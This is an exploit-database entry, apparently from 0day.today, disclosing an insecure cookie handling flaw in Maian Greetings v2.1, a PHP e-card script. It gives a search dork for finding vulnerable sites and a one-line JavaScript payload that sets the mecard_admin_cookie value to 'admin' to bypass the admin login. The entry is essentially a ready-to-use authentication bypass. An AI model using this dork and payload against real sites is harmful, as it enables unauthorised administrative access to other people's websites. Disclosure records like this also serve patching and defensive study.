id: 3387
date: 07/11/2008
title: Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
author: Saime
cves: 

==========================================================
Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
==========================================================



Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
Dork: Powered by: Maian Greetings v2.1

Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.

Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"




#  0day.today [2023-03-24]  #